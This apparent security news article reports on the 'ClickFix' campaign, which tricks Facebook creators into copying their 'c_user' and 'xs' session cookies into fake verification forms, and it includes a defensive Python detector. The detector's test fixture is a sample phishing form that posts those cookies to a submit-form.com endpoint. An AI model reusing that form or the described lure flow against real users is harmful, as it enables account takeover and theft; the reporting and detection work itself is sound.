A sophisticated phishing campaign, dubbed “ClickFix,” is actively targeting Facebook users, particularly content creators and business owners, stealing their account credentials and session tokens. This widespread attack, which has seen significant growth since early 2025, relies on social engineering, masquerading as official Facebook verification processes to trick victims into compromising their own accounts.
The ClickFix campaign exploits users’ desire for verification badges or their fear of account policy violations. Attackers create convincing fake Facebook help center or verification portal pages. These pages employ urgency and trust-building elements, such as instructional videos, to guide victims through a carefully orchestrated process designed to extract session tokens, the cookie values that authenticate an already logged-in browser session.
ClickFix Campaign Leverages Social Engineering for Facebook Token Theft
The core of the ClickFix attack lies in its deceptive use of social engineering rather than complex technical exploits. Victims are enticed by promises of free verification badges or warned of urgent account reviews. Upon clicking a malicious link, they are directed to meticulously crafted phishing pages that mimic Facebook’s official interface.
These fraudulent pages present users with scenarios requiring immediate action. Content creators and business page owners, often eager for the blue verification badge, are particularly susceptible. The attackers exploit this desire by simulating a verification or policy review process that demands user cooperation.
A pivotal aspect of the ClickFix campaign involves instructing victims on how to manually extract their Facebook session tokens. Through embedded instructional videos, attackers guide users to access their browser’s developer tools. Here, they are prompted to locate and copy specific session cookie values, primarily ‘c_user’ and ‘xs’, which are then submitted to the attackers.
Researchers from Hunt.io, building on initial findings by Unit42 Threat Intelligence in December 2025, have identified a robust and adaptable infrastructure behind this operation. The campaign, active since January 2025, has reportedly created over 115 distinct phishing pages and eight data collection endpoints, demonstrating its scale and persistence.
The stolen session tokens give attackers complete control over the compromised Facebook accounts: because the cookies replay an already authenticated session, the attacker never needs the password or any multi-factor prompt the victim has already passed. This can lead to various malicious activities, including unauthorized password changes, theft of sensitive payment information linked to the account, and impersonation of the victim.
The operational strategy of the ClickFix campaign involves a deliberately distributed infrastructure. Phishing pages are hosted on various abuse-friendly platforms such as Netlify, Vercel, GitHub Pages, and Surge. This allows attackers to rapidly deploy new pages within minutes if an existing one is detected and taken down, making containment challenging.
Data collection, a critical component of the attack, is handled by separate endpoints utilizing services like Formspark and submit-form.com, effectively decoupling the stolen data from the phishing sites themselves and adding another layer of obfuscation.
The Deceptive Attack Flow of ClickFix
The ClickFix attack initiates with a subtly designed redirect chain, aiming to provide a seamless user experience. A user might encounter a link on social media promising a free blue badge or a notification about a flagged account. The initial landing page often features animated verification screens and sounds to establish a sense of legitimacy.
Following the initial animation, victims are automatically redirected to a secondary page that fully replicates Facebook’s branding, complete with logos, color schemes, and official-sounding language. This page is crucial for reinforcing the illusion of an authentic Facebook process.
At this stage, the phishing page prominently displays urgent warnings and calls to action, such as “Action Required” buttons and countdown timers. These elements are designed to pressure users into immediate action, overriding their critical thinking.
The instructional video plays a key role by explicitly detailing how to access browser developer tools and locate the necessary session cookies. This step is where victims voluntarily provide their authentication tokens, believing it to be a standard verification procedure.
Upon entering the ‘c_user’ and ‘xs’ values into a form field, the JavaScript on the phishing page validates these tokens in real time against the format of legitimate Facebook session cookies. This filtering mechanism ensures that attackers receive only valid and usable session data, streamlining their account takeover efforts.
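The indicators described above (a form that asks for the ‘c_user’ and ‘xs’ cookie names, instructions that walk the user into browser developer tools, and a data collection endpoint on a third-party form backend such as submit-form.com) can be turned into a simple static detector for pages a security team pulls from user reports or proxy captures. The following is an added example written for this article, not code from Hunt.io, Unit42 or the campaign itself; the sample HTML is constructed, the scoring weights are the author's own choice, and the formspark.io domain is an assumed addition alongside the submit-form.com domain named in the article.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Cookie names the campaign instructs victims to paste (named in the article).
SESSION_COOKIE_NAMES = {"c_user", "xs"}
# Form-backend domains used for data collection. submit-form.com is named in the
# article; formspark.io is an assumed addition (Formspark's own domain).
COLLECTION_DOMAINS = {"submit-form.com", "formspark.io"}
# Phrases typical of the "open developer tools and copy your cookies" instructions.
INSTRUCTION_PHRASES = ("developer tools", "devtools", "application tab", "cookies")

_URL_RE = re.compile(r"""https?://[^\s'"<>)]+""", re.IGNORECASE)


class _FormCollector(HTMLParser):
    """Collects <form action=...> targets and <input>/<textarea> field names."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.input_names = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        elif tag in ("input", "textarea") and a.get("name"):
            self.input_names.append(a["name"].lower())


def _host_of(url):
    return (urlparse(url).hostname or "").lower()


def _is_collection_host(host):
    return any(host == d or host.endswith("." + d) for d in COLLECTION_DOMAINS)


def scan_page(html):
    """Scan one page's HTML (including inline JS) for session-harvesting indicators.

    Returns a dict with the raw hits, a numeric score and a verdict string so the
    result can be logged or fed into a ticketing workflow.
    """
    parser = _FormCollector()
    parser.feed(html)
    text = html.lower()

    # URLs referenced anywhere: form actions plus fetch()/XHR targets in inline JS.
    urls = set(parser.form_actions) | set(_URL_RE.findall(html))
    collection_targets = sorted(u for u in urls if _is_collection_host(_host_of(u)))
    cookie_fields = sorted(n for n in parser.input_names if n in SESSION_COOKIE_NAMES)
    cookie_mentions = sorted(
        c for c in SESSION_COOKIE_NAMES if re.search(r"\b" + re.escape(c) + r"\b", text)
    )
    instruction_hits = [p for p in INSTRUCTION_PHRASES if p in text]

    # Weighting is the author's own: a form field literally named after a session
    # cookie is the strongest signal, an off-site form backend the next strongest.
    score = 0
    if cookie_fields:
        score += 3
    if collection_targets:
        score += 2
    if len(cookie_mentions) == len(SESSION_COOKIE_NAMES):
        score += 1
    if len(instruction_hits) >= 2:
        score += 1
    verdict = "likely session-harvesting page" if score >= 3 else "no strong indicators"

    return {
        "collection_targets": collection_targets,
        "cookie_fields": cookie_fields,
        "cookie_mentions": cookie_mentions,
        "instruction_hits": instruction_hits,
        "score": score,
        "verdict": verdict,
    }


# Constructed sample resembling the page described in the article (not a real capture).
SAMPLE_PHISHING_HTML = """<html><body>
<h1>Facebook Verification Center</h1>
<p>Action Required: open your browser developer tools, go to the Application tab,
find the cookies for facebook.com and paste c_user and xs below.</p>
<form action="https://submit-form.com/EXAMPLE-FORM-ID" method="post">
  <input name="c_user"><input name="xs"><button>Verify</button>
</form>
<script>/* token format check would live here */</script>
</body></html>"""

# Constructed benign contact form for comparison.
SAMPLE_BENIGN_HTML = """<html><body><h1>Contact us</h1>
<form action="/contact" method="post"><input name="email">
<textarea name="message"></textarea></form></body></html>"""

if __name__ == "__main__":
    for label, page in (("phishing", SAMPLE_PHISHING_HTML), ("benign", SAMPLE_BENIGN_HTML)):
        print(label, scan_page(page))
```

Run the file directly to see both verdicts; in practice, feed it the HTML of a reported URL (fetched in an isolated environment) and alert when the verdict is positive. The check on form field names is deliberately exact rather than fuzzy, because a legitimate site has no reason to ask a user to type a session cookie value into a form.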
The attackers often include instructions for victims to avoid logging out for 24 hours. This directive is intended to keep the harvested session cookies active long enough for immediate account exploitation.
If the initial token theft fails or the session cookie expires, the ClickFix campaign has built-in fallback mechanisms. The fake verification page may present further harvesting stages, requesting backup or recovery codes. Subsequently, a pop-up might appear, demanding additional password verification. This final step aims to trick users into divulging their actual Facebook password, completing a credential harvesting chain that gives attackers multiple avenues for account access.